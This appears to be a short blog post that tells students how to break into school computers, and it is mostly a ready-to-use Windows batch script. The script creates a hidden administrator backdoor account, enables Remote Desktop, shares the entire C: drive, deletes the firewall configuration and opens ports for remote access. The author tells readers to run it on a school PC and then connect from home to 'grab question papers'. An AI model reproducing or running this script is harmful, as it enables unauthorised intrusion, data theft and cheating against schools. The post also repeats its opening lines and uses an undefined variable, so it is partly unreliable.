hi friends i am abhilash going to show how to hack school computers
there are many ways
1 dropping torjan
2 using malware
3 Creating a batch file encoded in Net Framework and applying it.
hi friends i am abhilash going to show how to hack school computers
there are many ways
1 dropping torjan
2 using malware
3 Creating a batch file encoded in Net Framework and applying it.
now i am going to tell you how do it with batch file
things required
*computer
*pen drive
*brain
*waiting for computer practical class
now copy the code given below to notepad and save it as xyz and give the extension of .bat means batch
you can give it any name
code=
@echo off
REM EDIT THESE SETTINGS
set username=USERNAME
set password=PASSWORD
set rdport=3389
set tnport=23
set rport=CHANGE_THIS
REM END EDITING SETTINGS
REM Adding The Backdoor
net user %username% %password% /add
REM Pause For Process
ping localhost -n 2 >nul
REM Adding Admin Access The Backdoor
net localgroup Administrators %username% /add
REM Hiding The Backdoor From Start Menu
REG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nul
REM Enabling Terminal Service
REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
REM Share C:\
net share system=C:\ /unlimited
REM Stealing The IP Stuff
ipconfig /all >> C:\attach.txt
REM Deleting The Firewall Configuration
netsh firewall delete
REM Opening Ports
netsh firewall add portopening TCP %rdport% "WinSvcService"
netsh firewall add portopening TCP %tnport2% "WinSvcService"
netsh firewall add portopening TCP %rport% "WinSvcService"
cls
exit
now you can to do some editing before you save it it is your wish
You can change the username, password and the rport (randomn port you choose to be opened)
At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.
as shown in the pic rectangled parts
Save it and remove your pen drive.
Now run this bat file in your school Pc.
Now when you get to your home, just telnet the pc or Remote desktop it.
have fun friends!
grab question papers!
No comments:
Post a Comment